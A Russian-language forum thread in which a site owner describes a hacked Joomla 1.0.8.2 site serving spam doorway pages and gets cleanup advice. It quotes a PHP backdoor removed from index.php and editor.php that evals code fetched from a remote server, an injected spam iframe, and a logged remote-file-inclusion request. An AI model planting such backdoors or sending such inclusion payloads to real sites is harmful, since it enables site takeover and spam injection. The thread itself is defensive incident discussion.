Стоит joomla 1.0.8.2 перешел ровно месяц назад с mamba т.к. очень часто атаковали хаккеры, поменял уязвимые компоненты, снес лишние... Собственно с сайтом все ок Но обнаружил в логах заходы поисковиков по адресам имядомена/?id=xxxxx По этим адресам идет чистый дор вначале вызывается <iframe src="http://googleloh.com/com/in.cgi?2&group=ph¶meter=valium+necklace+pendant&said=0711afisha" border=0 width="100%" height="100%"></iframe> дальше идет сам код странички Шаблоны чистые, index.php в корне чистый (удалил код <?php if(isset($_GET['id'])) { @eval(@file_get_contents('http://beliy.us/server/index1.php?host='.$_SERVER['SERVER_NAME'].'&id='.$_GET['id'])); } ?>- возможно он уже давно был залит) поотключал все папки, страница не отображается только если отключить includes/phpInputFilter/class.inputfilter.php Сейчас остановил сайт т.к. проблема не решена. Не пойму откуда берется сам код, из БД?
Скачать сайт, осуществить поиск по файлам на предмет iframe. И если уже переходить на Joomla 1.0, то на 1.0.15
Спасибо за быстрый ответ!!! Нашел я, это тотже код был еще в editor/editor.php странно дата изменения файла 2006 год, я и не обратил внимание на него Как дальше быть, кроме установки 1,0,15 как обезапасить себя (фак читал)
farmpak, если саму джумлу защитили, пользуясь FAQ, то можно подумать и о хостере, часто именно его агрехи и приводят к дефеисам
А это что за попытки взлома? //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.hfilm.co.kr/bbs/info/id.txt?? и таких запросов штуки 3 за день
sectus Спасибо за ответ при обновлении .htaccess не меняется же создается htaccess.txt Сейчас вручную исправил
